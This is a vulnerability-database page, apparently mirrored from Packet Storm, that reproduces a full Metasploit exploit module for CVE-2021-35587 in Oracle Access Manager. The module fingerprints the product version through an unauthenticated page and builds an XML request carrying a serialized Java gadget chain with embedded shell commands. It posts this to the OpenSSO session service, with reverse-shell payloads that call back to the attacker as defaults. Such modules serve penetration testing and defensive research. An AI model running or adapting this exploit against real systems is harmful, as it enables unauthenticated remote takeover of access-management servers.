Vulners
Lucene search
đ Oracle Access Manager Unauthenticated Remote Code Execution
đď¸Â 08 Apr 2025 00:00:00Reported by Peterjson, Y4er, sfewer-r7, JangType 
 packetstormđ packetstorm.newsđ 621 Views
| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
 | WebLogic Server Deserialization - Remote Code Execution | 6 Jun 202015:11 | â | 0daydb |
 | WebLogic Server Deserialization Remote Code Execution Exploit | 8 Jun 202000:00 | â | zdt |
 | Exploit for Missing Authentication for Critical Function in Oracle Access_Manager | 14 Mar 202205:03 | â | githubexploit |
| Exploit for CVE-2020-2883 | 13 May 202009:56 | â | githubexploit |
| Exploit for CVE-2020-2883 | 26 Nov 202014:10 | â | githubexploit |
| Exploit for CVE-2020-2883 | 14 Oct 202023:12 | â | githubexploit |
| Exploit for CVE-2020-2883 | 10 May 202009:04 | â | githubexploit |
| Exploit for CVE-2020-2551 | 16 May 202003:01 | â | githubexploit |
| Exploit for CVE-2020-2883 | 19 Aug 202003:34 | â | githubexploit |
| Exploit for Missing Authentication for Critical Function in Oracle Access_Manager | 14 Mar 202205:03 | â | githubexploit |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Oracle Access Manager unauthenticated Remote Code Execution',
'Description' => %q{
This module exploits an unauthenticated deserialization of untrusted data vulnerability in the OpenSSO
Agent component of the Oracle Access Manager (OAM) product. The affected product versions are 11.1.2.3.0,
12.2.1.3.0, and 12.2.1.4.0.
},
'License' => MSF_LICENSE,
'Author' => [
'Jang', # Original finder and technical analysis of CVE-2021-35587 (https://x.com/testanull)
'Peterjson', # Original finder of CVE-2021-35587
'Y4er', # This exploit uses a modified gadget chain from an exploit by Y4er (https://x.com/Y4er_ChaBug)
'sfewer-r7' # Metasploit module
],
'References' => [
['CVE', '2021-35587'],
# Original Analysis of the vulnerability by the original finders, Jang & Peterjson.
['URL', 'https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316'],
# Jang describes how to get a gadget chain working.
['URL', 'https://twitter.com/testanull/status/1502114473989279744'],
# This exploit uses a modified gadget chain from CVE-2020-2883, by Y4er.
['URL', 'https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java'],
# CVE-2021-35587 was patched by Oracle in Jan 2022.
['URL', 'https://www.oracle.com/security-alerts/cpujan2022.html']
],
'DisclosureDate' => '2022-01-19',
'Platform' => [ 'linux', 'unix', 'win' ],
'Arch' => [ARCH_CMD],
'Privileged' => false, # On Linux, executes as the user 'oracle'.
'Targets' => [
[
'Linux Command', {
'Platform' => [ 'linux', 'unix' ],
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/https/x64/meterpreter_reverse_tcp',
# A writable directory on the target for fetch based payloads to write to.
'FETCH_WRITABLE_DIR' => '/tmp'
}
}
],
[
'Windows Command', {
'Platform' => 'win',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/https/x64/meterpreter_reverse_tcp',
# A writable directory on the target for fetch based payloads to write to.
'FETCH_WRITABLE_DIR' => '%TEMP%'
}
}
],
# OAM can run on HP-UX, IBM AIX, and Solaris, so we have a separate Unix target for these.
[
'Unix Command', {
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
}
],
],
'DefaultOptions' => {
'RPORT' => 14100,
'SSL' => false,
'FETCH_COMMAND' => 'CURL',
# Delete the fetch binary after execution.
'FETCH_DELETE' => true
},
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
# By default, Oracle Access Manager is deployed on WebLogic under the path /oam/
OptString.new('TARGETURI', [ true, 'The base path to the OAM application', '/oam/'])
]
)
end
def check
detected_version = get_version
if detected_version
detected_description = "Oracle Access Manager #{detected_version}."
# According to Oracle, these 3 versions are affected.
affected_versions = [
'11.1.2.3.0',
'12.2.1.3.0',
'12.2.1.4.0'
]
affected_versions.each do |affected_version|
return CheckCode::Appears(detected_description) if detected_version == Rex::Version.new(affected_version)
end
return CheckCode::Safe(detected_description)
end
# By here we think the target is OAM, but we did not get a version number from the response body, so
# we cannot do a version based check to determine if vulnerable or safe.
CheckCode::Detected
rescue Msf::Exploit::Failed => e
return Exploit::CheckCode::Unknown(e.message)
end
def exploit
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'server', 'opensso', 'sessionservice'),
'ctype' => 'text/xml',
'data' => get_xml
)
fail_with(Failure::UnexpectedReply, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
end
def get_xml
gadget_b64 = Base64.strict_encode64(get_gadget)
requester_b64 = Base64.strict_encode64("object:#{gadget_b64}")
attr_authidentifier = {
'reqid' => Rex::Text.rand_text_alphanumeric(8..32),
'requester' => requester_b64
}.to_a.shuffle.to_h
builder_authidentifier = Nokogiri::XML::Builder.new do |xml|
xml.authIdentifier(attr_authidentifier) do |xml_authidentifier|
xml_authidentifier.SessionID Rex::Text.rand_text_alphanumeric(8..32)
end
end
attr_requestset = {
'svcid' => 'session',
'reqid' => Rex::Text.rand_text_alphanumeric(8..32),
'vers' => Rex::Text.rand_text_alphanumeric(8..32)
}.to_a.shuffle.to_h
attr_request = {
'dtdid' => Rex::Text.rand_text_alphanumeric(8..32),
'sid' => Rex::Text.rand_text_alphanumeric(8..32)
}.to_a.shuffle.to_h
builder_root = Nokogiri::XML::Builder.new(encoding: 'UTF-8') do |xml|
xml.RequestSet(attr_requestset) do |xml_requestset|
xml_requestset.Request(attr_request) do |xml_request|
xml_request.cdata(builder_authidentifier.to_xml)
end
end
end
xml_data = builder_root.to_xml
vprint_status('Using XML:')
vprint_line(xml_data)
xml_data
end
def get_gadget
detected_version = get_version
gadget_file = nil
case detected_version
when Rex::Version.new('12.2.1.4.0')
gadget_file = 'gadget_12.2.1.4.0.bin'
when Rex::Version.new('12.2.1.3.0')
gadget_file = 'gadget_12.2.1.3.0.bin'
else
fail_with(Failure::NoTarget, "No suitable gadget chain for this version: #{detected_version}.")
end
# See ./data/exploits/CVE-2021-35587/gadget.java for how we generate the gadget bin files.
gadget_data = ::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-35587', gadget_file))
shell_name = nil
shell_arg = nil
if (target.platform.platforms & [Msf::Module::Platform::Linux, Msf::Module::Platform::Unix]).any?
shell_name = '/bin/sh'
shell_arg = '-c'
elsif target.platform.platforms.include? Msf::Module::Platform::Windows
shell_name = 'cmd.exe'
shell_arg = '/C'
else
fail_with(Failure::BadConfig, "No gadget shell support for target #{target['Platform']}.")
end
{
'EXEC_ARG0' => shell_name,
'EXEC_ARG1' => shell_arg,
'EXEC_ARG2' => payload.encoded
}.each do |key, value|
gadget_data.gsub!(
[key.length].pack('n') + key,
[value.length].pack('n') + value
)
end
vprint_status("Using gadget (#{gadget_file}):")
vprint_line(Rex::Text.to_hex_dump(gadget_data))
gadget_data
end
def get_version
# This unauthenticated endpoint will conveniently report the OAM product version number.
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'pages', 'impconsent.jsp')
)
fail_with(Failure::UnexpectedReply, 'Connection failed') unless res
fail_with(Failure::UnexpectedReply, "Received unexpected HTTP status code: #{res.code}.") unless res.code == 200
# We expect a response to have one or both of these HTTP headers.
unless res.headers.key?('X-ORACLE-DMS-RID') || res.headers.key?('X-ORACLE-DMS-ECID')
fail_with(Failure::UnexpectedReply, 'No X-ORACLE-DMS-RID or X-ORACLE-DMS-ECID HTTP header seen')
end
unless res.body =~ /Oracle Access Management Version: (\d+\.\d+\.\d+\.\d+\.\d+)/
fail_with(Failure::UnexpectedReply, 'Unable to determine target version')
end
Rex::Version.new(Regexp.last_match(1))
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2025 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 3.19.8
CVSS 39.8
EPSS0.94371